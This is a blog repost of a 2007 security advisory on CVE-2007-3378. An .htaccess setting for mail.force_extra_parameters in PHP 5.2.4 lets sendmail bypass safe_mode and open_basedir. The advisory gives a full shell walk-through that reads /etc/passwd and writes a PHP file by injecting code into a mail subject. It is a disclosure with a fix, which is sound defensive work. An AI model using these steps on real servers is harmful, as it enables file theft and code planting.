[zt]PHP 5.2.4 mail.force_extra_parameters unsecure

Published on 2007 - 11 - 26

又一个bypass safemode,有趣的是这次用的是.htaccess.因此,只要此文件可写,或者可写的web目录下没有此文件,就可以利用.
ps:通过mail.force_extra_parameters,还真像当年的mail函数bypass safemode漏洞.


Topic : PHP 5.2.4 mail.force_extra_parameters unsecure

SecurityAlert : 47

CVE : CVE-2007-3378

SecurityRisk : Medium alert

Remote Exploit : No

Local Exploit : Yes

Exploit Given : Yes

Credit : Maksymilian Arciemowicz

Date : 25.11.2007


Affected Software : PHP <= 5.2.4


Advisory Text :



-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1



[PHP 5.2.4 mail.force_extra_parameters unsecure ]



Author: Maksymilian Arciemowicz (cXIb8O3)

SecurityReason

Date:

  • - Written: 06.09.2007
  • - Public: 0x.0x.2007


SecurityReason Research
SecurityAlert Id: 47

CVE: CVE-2007-3378
SecurityRisk: Medium

Affected Software: PHP <= 5.2.4
Advisory URL:
http://securityreason.com/achievement_securityalert/47
Vendor: http://www.php.net

  • --- 0.Description ---


PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique
PHP-specific features thrown in. The goal of the language is to
allow web developers to write dynamically generated pages
quickly.
When using PHP as an Apache module, you can also change the
configuration settings using directives in Apache configuration
files (e.g. httpd.conf) and .htaccess files. You will need
"AllowOverride Options" or "AllowOverride
All" privileges to do so.

php_value name value

Sets the value of the specified directive. Can be used only with
PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a
previously set value use none as the value.
Note: Don't use php_value to set boolean values. php_flag (see
below) should be used instead.

php_flag name on|off

Used to set a boolean configuration directive. Can be used only
with PHP_INI_ALL and PHP_INI_PERDIR type directives.

mail.force_extra_parameters - Force the addition of the specified
parameters to be passed as extra parameters to the sendmail
binary. These parameters will always replace the value of the 5th
parameter to mail(), even in safe mode

http://pl.php.net/manual/en/configuration.changes.php

  • --- 1. htaccess safemode and open_basedir Bypass Vulnerability

per mail.force_extra_parameters ---



We have recrived a lot of question about news

http://securityreason.com/news/0/0x1f . And we will show How to

exploit this issue. When using PHP as an Apache module, you can

also change the configuration settings using directives in

.htaccess file. But it is possible to bypass a safe_mode or

open_basedir per mail.force_extra_parameters. In a lot of servers

is sendmail, can be also exim etc. But we show how to exploit

this for a famous mail server (SENDMAIL).



For example you can set mail.force_extra_parameters via

.htaccess.



cxib# curl -I http://localhost:82

HTTP/1.1 200 OK

Date: Thu, 06 Sep 2007 22:18:35 GMT

Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1

DAV/2 PHP/5.2.4

Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT

ETag: "27e4f0-2c-4c23b600"

Accept-Ranges: bytes

Content-Length: 44

Content-Type: text/html



Apache 2.2.4 and PHP 5.2.4. Let's see folder

"/narkotyk" in localhost:82.



cxib# ls -la

total 10

drwxrwxrwx 2 www www 512 Sep 7 00:26 .

drwxr-xr-x 4 www wheel 512 Sep 7 00:22 ..

  • -rw-r--r-- 1 www www 106 Sep 7 00:25 .htaccess
  • -rw-r--r-- 1 www www 29 Sep 7 00:25 file1.php
  • -rw-r--r-- 1 www www 56 Sep 7 00:26 file2.php

cxib# cat file1.php

<? include("/etc/passwd"); ?>



cxib# curl http://localhost:82/narkotyk/file1.php

<br />

<b>Warning</b>: include() [<a

href='function.include'>function.include</a>]: SAFE MODE

Restriction in effect. The script whose uid is 80 is not allowed

to access /etc/passwd owned by uid 0 in

<b>/usr/local/www/apache22/data/narkotyk/file1.php</b>

; on line <b>1</b><br />

<br />

<b>Warning</b>: include(/etc/passwd) [<a

href='function.include'>function.include</a>]: failed to

open stream: Invalid argument in

<b>/usr/local/www/apache22/data/narkotyk/file1.php</b>

; on line <b>1</b><br />

<br />

<b>Warning</b>: include() [<a

href='function.include'>function.include</a>]: Failed

opening '/etc/passwd' for inclusion (include_path='.:') in

<b>/usr/local/www/apache22/data/narkotyk/file1.php</b>

; on line <b>1</b><br />



so safe_mode is open.

Let's see files .htaccess and file2.php



cxib# cat file2.php

<? var_dump(mail("root@localhost",

"hallo", "root")); ?>

cxib# cat .htaccess

php_value mail.force_extra_parameters '-C /etc/passwd -X

/usr/local/www/apache22/data/narkotyk/result.txt'



and let's send request to file2.php



cxib# curl http://localhost:82/narkotyk/file2.php

bool(false)



False!? No



cxib# ls -la /usr/local/www/apache22/data/narkotyk/result.txt

  • -rw-r--r-- 1 www www 7130 Sep 7 00:31

/usr/local/www/apache22/data/narkotyk/result.txt

cxib#



result.txt has been created.



cxib# cat /usr/local/www/apache22/data/narkotyk/result.txt

69647 >>> /etc/passwd: line 3: unknown configuration

line "root:*:0:0:Charlie &:/root:/bin/csh"

69647 >>> /etc/passwd: line 4: unknown configuration

line "toor:*:0:0:Bourne-again Superuser:/root:"

..... etc.



We can read file and safe_mode and open_basedir is bypassed.



It is possible create file with php code. But we need have

sendmail.cf to send email.



Example:



cxib# cat .htaccess

php_value mail.force_extra_parameters '-C

/usr/local/www/apache22/data/narkotyk/sendmail.cf -X

/usr/local/www/apache22/data/narkotyk/phpcode.php'

cxib# cat file3.php

<? var_dump(mail("root@xxxxxxxxxxxxxxxxxx",

"h<? phpinfo(); ?>allo", "root"));

?>



We need create /usr/local/www/apache22/data/narkotyk/sendmail.cf

and configure this file. Then



cxib# curl http://localhost:82/narkotyk/file3.php

bool(true)

cxib#

cxib# cat phpcode.php

69755 <<< To: root@xxxxxxxxxxxxxxxxxx

69755 <<< Subject: h<? phpinfo(); ?>allo

69755 <<<

69755 <<< root

69755 <<<

69757 === CONNECT securityreason.pl

... etc



and now



cxib# curl http://localhost:82/narkotyk/phpcode.php

69755 <<< To: root@xxxxxxxxxxxxxxxxxx

69755 <<< Subject: h<!DOCTYPE html PUBLIC

"-//W3C//DTD XHTML 1.0 Transitional//EN"

"DTD/xhtml1-transitional.dtd">

<html><head>

<style type="text/css">

body { color: #000000;}

body, td, th, h1, h2 {font-family: sans-serif;}

... phpinfo().



This was example for php 5.2.4 with sendmail. But we think, it is

possible exploit exim and more send mail programs. In PHP 5.2.4

mail.force_extra_parameters is filtered per

php_escape_shell_cmd(). But we needn't bypass this function.


  • --- mail.c ---

if (force_extra_parameters) {

extra_cmd = php_escape_shell_cmd(force_extra_parameters);

} else if (extra_cmd) {

extra_cmd = php_escape_shell_cmd(extra_cmd);

}

  • --- mail.c ---


Interesting is:

  • --- mail.c ---

if (PG(safe_mode) && (ZEND_NUM_ARGS() == 5)) {

php_error_docref(NULL TSRMLS_CC, E_WARNING, "SAFE MODE

Restriction in effect. The fifth parameter is disabled in SAFE

MODE.");

RETURN_FALSE;

}

  • --- mail.c ---


5 th parameter in mail() function is checked.
mail.force_extra_parameters no.

Before public advisory we tested issue and we send advisory to
PHP Team. Main problem is that, we do not recived any answer.
We do not checked patch to CVE-2007-3378 (SREASONRES:20070627),
but we are using CVE-2007-3378 to identification .

http://securityreason.com/achievement_securityalert/47

php_escape_shell_cmd() is not reason for CVE-2007-3378.

  • --- 2. Exploit ---

SecurityReason will not public official exploit for this issue.



Anybody can self exploit this.


  • --- 3. How to fix ---


  • --- note from SREASONRES:20070627 ---

This bug has been founded on February 2007

We contacted with PHP Team again.

With co-operation Stanislav Malyshev from PHP Team the PHP 5.2.5

is now fully patched against

"mail.force_extra_parameters" issue .

  • --- note from SREASONRES:20070627 ---


Update to PHP5.2.5

  • --- 4. Greets ---


For: sp3x, Infospec, p_e_a, l5x and Stefan Esser

  • --- 5. Contact ---


Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (FreeBSD)

iD8DBQFHSZ1w3Ke13X/fTO4RAnKnAJ0drPZhrdtiheaR9b8mLZ0IjyJoIQCfZC3A
jn8i1L2eCHVS1jBuN24ySc0=
=ZCW0
-----END PGP SIGNATURE-----

Comments
Write a Comment